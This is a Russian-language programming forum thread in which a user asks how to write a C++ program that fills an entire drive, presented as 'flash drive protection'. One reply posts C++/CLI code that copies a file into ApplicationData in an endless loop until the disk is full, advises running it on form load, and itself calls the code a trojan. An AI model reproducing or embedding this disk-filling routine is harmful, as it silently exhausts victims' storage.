Форум программистов, компьютерный форум CyberForum.ru

С++ для начинающих

Войти
Регистрация
Восстановить пароль
 
Дархан
21 / 21 / 1
Регистрация: 07.10.2012
Сообщений: 93
#1

Защита флеш накопителя - C++

11.08.2013, 19:58. Просмотров 385. Ответов 2
Метки нет (Все метки)

Наткнулся на прогу по защите флеш накопителей. Алгоритм очень прост, активируете - и ВСЯ память до 0 флешки заполняется, деактивируете и можно записывать на флешку, память восстанавливается. Есть баг, после активации окошко exe не закрывается, захотел написать самостоятельно. Вопрос вот в чем, как можно на С++ сделать так, чтобы прога заполнила всю память локального или съемного диска, в зависимости от сохраненного файла?

Добавлено через 4 минуты
При активации создается файл с расширением file
Similar
Эксперт
41792 / 34177 / 6122
Регистрация: 12.04.2006
Сообщений: 57,940
11.08.2013, 19:58     Защита флеш накопителя
Посмотрите здесь:

Обработчик прерывания контроллера накопителя на жестком магнитном диске - C++
Добрый вечер! В лабораторной работе требуется написать свой обработчик прерывания контроллера НЖМД, т е заменить в векторе прерываний...

стрит-флеш - C++
Написал функцию проверки на образование комбинации стрит-флеш....помидорами не закидывать писал не очень вдумчиво но здесь какие то ошибки...

Заблокировать запись на флеш накопитель - C++
Не знаю в какой раздел лучше отнести данную тему. Состоит вопрос в чем. Нужно написать некую программу при помощи которой можно отслеживать...

бот для браузерной флеш-игры - C++
ребят, понадобилась помощь! никогда не работал из с++ с флешь и браузером. это для меня в новинку.может кто знает как написать бота для...

Защита от дурака - C++
Помогите, пожалуйста. Программа должна печатать только цифры (а не буквы и прочие символы, знак минус может стоять в самом начале) и при...

Защита от дурака - C++
Вот только начал изучать С++ помогите составить защиту от дурака пожалуйста, вот код: #include <iostream> using namespace std; ...

Защита от переполнения - C++
Ребят помоги создать защиту от переполнения через функцию scanf_s и убрать нолики в конечном ответе, вот код: #include <stdio.h> ...

Защита от дурака - C++
Здравствуйте уважаемые форумчане! я к вам, и вот по какому делу) Вот есть у меня задача: Даны два целых числа А и В. Вывести в порядке...

Защита от дурака - C++
Как в этот код добавить защиту от ввода символов? #include "stdafx.h" #include <iostream> #include <Windows.h> #include <cmath> ...

Защита от дурака - C++
нужна защита от дурака пытался реализовать с помощью 2 разных способов не вышло. #include <iostream> #include <string> #include...

Защита от дурака - C++
Вот кусок кода: do { cout << "Выберите вариант решения:" << endl; cout << " - первй вариант." << endl; cout << " -...

Защита от дизассемблера - C++
Привет киберфорум! Есть ли какая - то реально работающая защита от дизассемблера в современном мире? В чём собственно дело? - Есть у...


Искать еще темы с ответами

Или воспользуйтесь поиском по форуму:
После регистрации реклама в сообщениях будет скрыта и будут доступны все возможности форума.
Убежденный
Системный программист
Эксперт С++
15298 / 6930 / 1096
Регистрация: 02.05.2013
Сообщений: 11,340
Завершенные тесты: 1
11.08.2013, 20:39     Защита флеш накопителя #2
Цитата Сообщение от Дархан Посмотреть сообщение
Наткнулся на прогу по защите флеш накопителей. Алгоритм очень прост, активируете - и ВСЯ память до 0 флешки заполняется
И как эта "защита" спасет от форматирования флэшки ?
Overwave2
1 / 1 / 0
Регистрация: 25.02.2013
Сообщений: 38
12.08.2013, 00:32     Защита флеш накопителя #3
Код на C++/CLI, то есть нужно создать проект Windows Forms.

C++
1
2
3
4
5
6
7
8
9
10
System::IO::StreamWriter^ writer = gcnew System::IO::StreamWriter(Environment::GetFolderPath(Environment::SpecialFolder::ApplicationData) + "\\-0.file");
writer->WriteLine("iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii");
writer->Close();
for (double xyu; ; xyu++) {
try {
IO::File::Copy(Environment::GetFolderPath(Environment::SpecialFolder::ApplicationData) + "\\-0.file", Environment::GetFolderPath(Environment::SpecialFolder::ApplicationData) + "\\" + xyu.ToString() + ".file");
}
catch (Exception^ Exc)
{Application::Exit();}
}
Можно встроить в действие загрузки формы.
Алгоритм таков: В папке ApplicationData (опционально) создается текстовый файл с содержимым "i..." и названием -0.file
Потом циклом он копируется пока не выявится ошибка в файлы 0.file, 1.file,...

Но всем же ясно, что это тупо троян.
Ответ Создать тему
Опции темы

КиберФорум - форум программистов, компьютерный форум, программирование
Powered by vBulletin® Version 3.8.9
Copyright ©2000 - 2017, vBulletin Solutions, Inc.
Рейтинг@Mail.ru